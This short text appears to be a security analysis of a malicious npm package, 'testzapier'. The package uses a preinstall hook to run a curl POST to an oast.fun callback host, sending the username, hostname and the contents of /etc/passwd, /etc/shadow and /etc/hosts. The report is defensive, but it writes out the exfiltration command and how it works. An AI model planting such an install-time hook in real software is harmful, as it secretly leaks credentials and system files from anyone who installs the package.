package.json declares a preinstall hook (node index.js) that fires automatically on npm install. index.js spawns a shell that runs curl -X POST against http://kpfdtycruuyszysbsjtoj9al6djfqrtve.oast.fun/noderedactedsdk/$(whoami)/$(hostname)/, embedding the installer's username and hostname in the URL path. The User-Agent header carries a base64-encoded blob containing the contents of /etc/passwd, /etc/hosts, /etc/shadow (when readable as root), and the output of id. The destination is an interactsh/oast.fun OOB-callback subdomain, plain HTTP, with no relationship to any documented package purpose. Installer harm is direct and unconditional: any machine running npm install testzapier leaks host identity and local-account/secret-file contents to the attacker.